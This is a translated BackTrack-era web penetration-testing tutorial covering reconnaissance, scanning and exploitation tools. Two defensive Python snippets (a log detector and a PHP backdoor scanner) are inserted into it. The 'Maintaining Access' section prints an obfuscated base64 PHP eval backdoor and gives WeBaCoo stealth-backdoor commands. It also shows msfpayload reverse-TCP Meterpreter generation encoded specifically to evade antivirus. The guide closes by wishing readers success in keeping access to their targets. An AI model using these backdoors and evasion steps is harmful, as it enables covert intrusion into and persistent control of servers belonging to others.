Computer Security
Written by
Caleb Bucker
Pen-Tester – Ethical Hacker – Security Researcher
http://calebbucker.blogspot.com/
http://www.twitter.com/CalebDrugs
https://www.facebook.com/caleb.bucker
mailto:calebbucker@gmail.com
Original copy in Spanish:
http://www.sendspace.com/file/gyljvj
PENETRATION TESTING
Web Analysis ‐ Vulnerability Assessment – Exploitation
Translated By
Mohamed Abdel Azim Mohamed
Index
• INTRODUCTION
• METHODS OF ANALYSIS OF WEB APPLICATIONS
1. NETWORK MAPPING
• Nmap
• Netifera
2. INFORMATION GATHERING
• TheHarvester
• Maltego
3. CMS IDENTIFICATION
• BlindElephant
• CMS-Explorer
• WhatWeb
4. IDS/IPS DETECTION
• Waffit
5. OPEN SOURCE ANALYSIS
• GHDB (Google Hacking DataBase)
• Xssed
6. WEB CRAWLERS
• WebShag
• DirBuster
7. VULNERABILITY ASSESSMENT AND EXPLOITATION
• JoomScan
• SqlMap
• Fimap
• Shodan
• W3af
• Uniscan
• Nikto
8. MAINTAINING ACCESS
• Weevely
• WeBaCoo
• MsfPayload
9. CONCLUSION
INTRODUCTION
Today, as many of us pen-testers know, the analysis of web applications plays a very important role in a
security evaluation and/or penetration test, since it gives us the appropriate information about the web
application, such as the plugins it uses or the type of CMS (Joomla, WordPress or others).
This helps us determine which exploit we should use, or see exactly how to exploit the vulnerabilities that
may appear while performing the penetration test.
Penetration tests are also used to determine the level of security of a computer, a computer network, a
LAN (Local Area Network) or WLAN (Wireless Local Area Network), or web applications, among others,
using simulated attacks identical to those a Black Hat hacker or cracker would carry out, but without
compromising the information or the availability of services. This is done in order to identify potential
threats in IT systems before an attacker (external or internal) discovers them. This process is also known
as Ethical Hacking.
To perform this penetration testing procedure, BackTrack 5 R3 is used, a Linux distribution based on
Ubuntu that is well suited to carrying out these tests, as it comes with a set of very important tools that
help obtain all the necessary information about web applications, among other things.
BackTrack Wiki:
http://www.backtrack-linux.org/wiki/
Download:
http://www.backtrack-linux.org/downloads/
METHODS OF ANALYSIS OF WEB APPLICATIONS:
1. NETWORK MAPPING:
Network mapping is the study of the physical connectivity of a network; Internet mapping is the study of
the physical connectivity of the Internet. Network mapping often determines which servers and
operating systems are running on the network. The law and ethics of port scans are complex: a scan of
the network can be detected by humans or automated systems and treated as a malicious act.
The BackTrack suite includes Nmap, a tool we all know for its power and effectiveness, which is very
useful for carrying out this important step in a web audit.
• NMAP:
Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap
uses raw IP packets in novel ways to determine which hosts are available on a network, which services
(application name and version) they offer, which operating systems (and versions) they run, what type
of packet filters or firewalls are in use, and dozens of other characteristics.
Use:
nmap www.sitio-web.com
nmap 192.168.1.1
• NETIFERA:
Netifera is a network scanner that can perform passive scanning (analyzing a pcap file or sniffing the
live network) and active scanning (port scanning of a target). It identifies the hosts on the network.
This project offers many advantages for security developers and researchers who want to implement new
tools, as well as for the community of users of these tools.
This tool is included in BackTrack and is located at the following address:
Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts –
Netifera
Usage is very easy: just enter the web address where it says "Type Address", press Enter, and it will
produce the target websites and IPs to audit.
In this case I entered the website www.paypal.com, on which I performed Reverse Lookup, TCP Connect
Scan, UDP Scan, Crawler, NS Lookup and Brute Force Host Name.
2. INFORMATION GATHERING
The first phase of a security assessment focuses on gathering as much information as possible about a
web application. Information gathering is the most critical step of a web application security test. This
task can be accomplished in many different ways: using public tools (search engines) or scanners, or by
sending simple or specially crafted HTTP requests, it is possible to force the application to leak
information, for example through error messages or the versions and technologies it uses.
There are basically two types of information gathering: active and passive. In passive information
gathering the attacker does not communicate directly with the target and tries to gather information that
is available on the Internet, while in active information gathering the attacker is in direct contact with the
target while gathering information.
• THEHARVESTER:
theHarvester is a tool to collect email accounts, user names, and host names or subdomains from
different public sources such as search engines and PGP key servers.
Use:
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin
• MALTEGO:
Maltego is an information gathering and forensics tool that shows how pieces of information are
connected to each other. With Maltego we can find the relationships people commonly expose today,
including social profiles (Facebook, Twitter), mutual friends, businesses related to the information
gathered, and websites. If we collect information about infrastructure, we can gather the relationships
between domains and DNS names.
Location:
Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
3. CMS IDENTIFICATION
• BLINDELEPHANT:
BlindElephant is a Python-based tool used for web application fingerprinting. The tool is fast, uses
little bandwidth and is highly automated.
Use:
/pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms
• CMS-EXPLORER:
CMS-Explorer also fingerprints web applications and can be used to identify the type of CMS in use, so
that the attack is chosen according to the information obtained.
Use:
/pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
• WHATWEB:
It is another tool used to identify the type of content management system (CMS), blogging platform,
statistics packages, JavaScript libraries and web servers in use. It has 900 plugins for web analysis
purposes.
Use:
/pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/
/pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/
/pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/
/pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24
4. IDS/IPS DETECTION
While performing a VA/PT on a domain, it is possible that IDS/IPS services are installed; these can
sometimes stop several types of attacks made against the domain.
Many WAFs (Web Application Firewalls) are sold to companies as a successful technique for mitigating
vulnerabilities in web applications.
Luckily, a WAF is easy to detect, because most of them use signature-based detection methods, and
therefore the attacker can try to encode parameters and attempt to bypass the WAF.
The BackTrack suite includes a useful tool for detecting IDS/IPS, which is Waffit.
• WAFFIT:
It is a tool that detects the possible firewall a web server may have. This is no small matter, since
detecting the firewall behind the domain is a very important step in the penetration testing process.
Use:
/pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
5. OPEN SOURCE ANALYSIS
Open-source analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB (Google
Hacking Database) and XSSed are websites, while revhosts is a console tool.
• GHDB:
Google Hacking Database: the exploit-db team maintains a database of Google dorks that can greatly
help a pen-tester's information gathering. We can use the dorks to find certain types of vulnerable servers
or other information.
For example, a Google dork like "Microsoft-IIS/6.0" intitle:index.of can be used to detect servers
running Microsoft IIS 6.0.
• XSSED:
http://www.xssed.com/ is a website that contains a list of websites vulnerable to Cross Site Scripting
(XSS), reported by various authors.
It can be opened from: Applications - Backtrack - Information Gathering - Web Application
Analysis - Open Source Analysis - Xssed.
6. WEB CRAWLERS
In this last category of web analysis, well-known crawlers are used; they help a lot in listing the "hidden"
files and folders inside a web server.
The BackTrack suite has many tools to perform this type of analysis, such as DIRB, Golismero, SQLScan,
Deblaze and WebShag.
• WEBSHAG:
Webshag is a tool programmed in Python that combines features useful for auditing web servers, such as
web crawling, URL scanning and file fuzzing.
Webshag can be used to analyze a web server over HTTP or HTTPS, through a proxy, and using HTTP
authentication (Basic and Digest).
It also proposes innovative IDS evasion features, intended to make correlation between requests more
complicated (for example, using a random proxy server for each HTTP request).
It can be opened from Applications - BackTrack - Information Gathering - Web Application
Analysis - Web Crawlers - WebShag Gui.
• DIRBUSTER:
DirBuster is a Java application designed to brute force directory and file names on web servers and
applications. It is often the case that what looks like a web server in a default installation state is
actually not, and has pages and applications hidden within it; DirBuster tries to find these.
DirBuster comes with a total of 9 different lists, which makes it extremely effective at finding hidden
files and directories. And if that were not enough, DirBuster also has the option of performing a pure
brute force.
It can be found at the following location: Applications - BackTrack - Vulnerability Assessment -
Web Application Assessment - Web Application Fuzzers – DirBuster
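From the defender's side, a directory brute force of the kind DirBuster performs shows up in the access log as a burst of 404 responses for many different paths from one client. The detector below is an added example (not part of the original guide or of DirBuster); the log lines and IP addresses are constructed samples, and the log is assumed to be in chronological order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {"ip": m.group("ip"),
            "ts": datetime.strptime(m.group("ts"), TS_FMT),
            "path": m.group("path"),
            "status": int(m.group("status"))}


def find_dir_bruteforce(lines, window_seconds=60, threshold=5):
    """Flag client IPs that request at least `threshold` distinct non-existent
    paths (404) within a sliding window of `window_seconds`. A browser that
    keeps missing the same path (favicon.ico) counts once and is not flagged."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # ip -> deque of (timestamp, path) for 404s
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        q = recent[rec["ip"]]
        q.append((rec["ts"], rec["path"]))
        while q and rec["ts"] - q[0][0] > window:  # drop hits outside the window
            q.popleft()
        distinct = {path for _, path in q}
        if len(distinct) >= threshold and rec["ip"] not in flagged:
            flagged[rec["ip"]] = {"at": rec["ts"], "distinct_404_paths": len(distinct)}
    return flagged


# Constructed sample log: 203.0.113.5 walks a wordlist and collects 404s within
# seconds; 198.51.100.7 is a normal visitor whose browser keeps missing favicon.ico.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2012:13:55:30 +0000] "GET / HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2012:13:55:31 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /admin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /backup/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2012:13:55:37 +0000] "GET /old/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2012:13:55:38 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2012:13:55:38 +0000] "GET /test/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2012:13:55:39 +0000] "GET /config/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2012:13:55:40 +0000] "GET /.git/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2012:13:55:45 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2012:13:55:50 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2012:13:55:55 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_dir_bruteforce(SAMPLE_LOG))
```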
7. VULNERABILITY ASSESSMENT AND EXPLOITATION
The vulnerability assessment stage is where we can probe our target for flaws, but before a
vulnerability assessment, gathering information about the target is much more useful.
The information gathering phase remains the key step before further attacks, simply because it makes the
job easier; for example, in the first stage, using a CMS identification scanner such as BlindElephant, we
scanned and found the version of the installed application.
Now, in the vulnerability assessment stage, we can use many tools (scanners) that help a lot in finding
vulnerabilities in the specific web server.
• JOOMSCAN:
It is a Perl-based tool used to identify known vulnerabilities such as SQL injection, XSS and others on
web servers based on the Joomla platform.
• Detects the version of Joomla! that is running.
• Scans and locates known vulnerabilities in Joomla! and its extensions.
• Reports in text or HTML format.
• Allows immediate updating via the scanner or svn.
• Detects vulnerability types: SQL injection, LFI, RFI, XSS and others.
It can be opened from
/pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com
• SQLMAP:
It is a tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities,
allowing full access to the database behind the web server.
It can be opened from
/pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
• FIMAP:
It is a small tool programmed in Python which can find, prepare, audit and automatically exploit Remote
File Inclusion errors in web applications. It is currently under development, but it is usable. The
objective of Fimap is to improve the quality and security of your website.
It can be opened from
/pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23
/pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
• SHODAN:
This is another site evaluation tool, of particular use to pentesters. It can be used to collect a range of
intelligence about devices that are connected to the Internet.
We can, for example, check whether network devices such as routers, VoIP systems, printers, cameras,
etc. are present. To find whether a service is running in the domain, the syntax would be:
• hostname:target.com port:80,21,22
If we simply want the results for the host name, the syntax would be:
• hostname:target.com
• W3AF:
w3af is an audit tool for web application security; it is basically divided into several modules such as
Attack, Audit, Exploit, Discovery, Brute Force and Evasion, which can all be used as needed. These
modules come with several sub-modules; for example, we can select the XSS module under Audit if we
need to perform that particular audit.
It can be opened from
Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
Vulnerability Scanners - w3af
Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the
specified website, which can then be used for further exploitation.
• UNISCAN:
A web vulnerability scanner oriented to computer security, aimed at finding vulnerabilities in web
systems. It is licensed under the GNU General Public License 3.0 (GPL 3).
Uniscan is developed in Perl, handles regular expressions easily and is also multi-threaded.
Features:
• Identification of system pages via a web crawler.
• Testing of the pages found via the GET method.
• Testing of the forms found via the POST method.
• Support for SSL requests (HTTPS).
• Proxy support.
• Generation of site lists via Google.
• Generation of site lists via Bing.
• Client GUI written using Perl Tk.
It can be downloaded from the following link:
http://uniscan.sourceforge.net/?page_id=7
It can be run with: ./uniscan.pl -u http://www.sitio-web.com/ -qweds
• NIKTO:
It is a web server scanner which performs comprehensive tests against web servers for multiple items,
including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250
servers, and version-specific problems on over 270 servers. It also checks server configuration items,
such as the presence of multiple index files and HTTP server options.
Nikto is a robust project that has been several years in development and is constantly evolving. Some
of the most interesting features of this tool include the ability to generate reports in various formats,
integration with LibWhisker (anti-IDS) and integration with Metasploit, among others.
It can be opened from
Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
Vulnerability Scanners - Nikto
Use:
/pentest/web/nikto# ./nikto.pl -host www.sitio-web.com
8. MAINTAINING ACCESS
Once we have access to the website (target), we need to maintain that access for future use, so that we
do not have to start from scratch again and again. To do this, we can upload web shell backdoors to the
web server. The encoding of the backdoor is also important, so as not to create "noise" when it is loaded
on the server; otherwise administrators can easily detect and remove the backdoors.
The BackTrack 5 R3 suite incorporates good tools to carry out this process, which are:
• WEEVELY:
It is an essential tool for post-exploitation of web applications, and can be used as a backdoor or a web
shell to manage web accounts. Weevely looks for enabled functions such as system(), passthru(),
popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system() and python_eval() on the
remote server. The following code is an example of the backdoor code created by Weevely.
-------------------------------------------------------------------------------------------------------------------
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk
YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv
c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK
GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));
-------------------------------------------------------------------------------------------------------------------
It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors -
Weevely
Use:
/pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
/pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password
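A defender-side check for this kind of backdoor, added here as an example and not part of the original guide or of Weevely: it unwraps nested eval(base64_decode(...)) layers in PHP source, looks for the execution functions listed above, and flags files where request-controlled input can reach them. The PHP samples are constructed, not the blob shown above.

```python
import base64
import re

# Functions the page lists Weevely probing for on the server, plus eval/assert,
# which are the usual wrappers around an encoded payload.
DANGEROUS_FUNCS = ("system", "passthru", "popen", "exec", "proc_open",
                   "shell_exec", "pcntl_exec", "eval", "assert")

# eval(base64_decode('...')) with either quote style; group 1 is the blob.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)""",
    re.IGNORECASE)
FUNC_CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_FUNCS) + r")\s*\(",
                          re.IGNORECASE)
INPUT_RE = re.compile(r"\$_(GET|POST|COOKIE|REQUEST|SERVER)\b")


def unwrap_base64_layers(source, max_depth=5):
    """Return each decoded eval(base64_decode(...)) layer, outermost first.
    Shells of this kind often nest one encoded layer inside another, so keep
    unwrapping until no encoded eval remains or the depth cap is reached."""
    layers = []
    current = source
    for _ in range(max_depth):
        m = EVAL_B64_RE.search(current)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            current = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers.append(current)
    return layers


def scan_php(source):
    """Summarise one PHP file: dangerous functions called in the visible source,
    those hidden behind base64 layers, and whether request input appears."""
    layers = unwrap_base64_layers(source)
    direct = sorted({f.lower() for f in FUNC_CALL_RE.findall(source)})
    hidden = sorted({f.lower() for layer in layers
                     for f in FUNC_CALL_RE.findall(layer)})
    uses_input = any(INPUT_RE.search(t) for t in [source] + layers)
    return {
        "encoded_layers": len(layers),
        "direct_calls": direct,
        "hidden_calls": hidden,
        "uses_request_input": uses_input,
        # An encoded eval is suspicious on its own; a plain dangerous call is
        # suspicious when request input can reach it.
        "suspicious": bool(layers) or (bool(direct) and uses_input),
    }


# Constructed samples (not the page's blob): two nested base64 layers around a
# command-execution call, a plain one-liner, and ordinary application code.
_LAYER1 = base64.b64encode(b'shell_exec($_COOKIE["k"]);').decode()
_LAYER2 = base64.b64encode(
    ("eval(base64_decode('%s'));" % _LAYER1).encode()).decode()
SAMPLE_NESTED = "<?php eval(base64_decode('%s')); ?>" % _LAYER2
SAMPLE_DIRECT = '<?php system($_GET["cmd"]); ?>'
SAMPLE_BENIGN = '<?php $rows = $db->query("SELECT id FROM users"); echo count($rows); ?>'
```

Run scan_php over every .php file in the web root and review anything reported as suspicious; legitimate code that uses these functions with fixed arguments will show direct calls but no request input.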
• WEBACOO:
WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP
between client and web server. It is a post-exploitation tool to maintain access to a (hacked) web server.
It was designed to operate under the radar of modern up-to-date AV, NIDS, IPS, network firewalls and
application firewalls, providing a stealth mechanism to execute commands on the compromised
server. The obfuscated file communicates via the HTTP Cookie header, validating the HTTP requests
and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP
backdoor using predefined payloads. It also offers a "terminal" mode in which the user can establish
a remote connection to the server and execute commands with the privileges of the web service.
The download is available from Github:
https://github.com/anestisb/WeBaCoo
Options:
1) Create the obfuscated backdoor 'backdoor.php' with default settings:
• ./webacoo.pl -g -o backdoor.php
2) Create the de-obfuscated backdoor 'raw-backdoor.php' using the "transit" function:
• ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
3) Establish a "terminal" connection to the remote host using the default settings:
• ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
4) Establish a "terminal" connection to the remote host with some arguments configured:
• ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"
5) Establish a "terminal" connection to the remote host via an HTTP proxy:
• ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
6) Establish a "terminal" connection to the remote host via an HTTP proxy with basic authentication:
• ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
7) Establish a "terminal" connection to the remote host via Tor and log the activity:
• ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
• MSFPAYLOAD:
Metasploit can be used to create backdoors that can then be used to maintain access to the web server.
This can be done with the help of msfpayload. The steps to create a backdoor with msfpayload are as
follows: we have to select the payload that we will use to get a Meterpreter shell through a reverse TCP
connection. The command would be:
msfpayload windows/meterpreter/reverse_tcp
This payload has two parameters: LHOST (our IP) and LPORT to select the port that we will use. "R"
is used to output the payload in raw format so that we can then encode it.
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R
This command will create the payload, but it has to be encoded to avoid antivirus detection; this can be
done using msfencode, and to do so we need to use a pipe ("|"):
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R | msfencode -e
x86/shikata_ga_nai -t exe > bucker.exe
-e is used to specify the encoder, in this case shikata_ga_nai, and -t the output file type (exe). If we
want to see the list of available MSF encoders, we use the following command:
msfencode -l
9. CONCLUSION
These are only a few of the methods you can follow to exploit vulnerabilities in a web application.
Once we have the information about our target, we try to perform a vulnerability assessment in order to
obtain information about the exploits that can be used.
Once that is done, we exploit the vulnerabilities and, if necessary, upload a backdoor; but before that, the
backdoor must be encoded to avoid detection.
I hope this helps you with finding vulnerabilities, exploitation, and maintaining access to your target.
Greetings.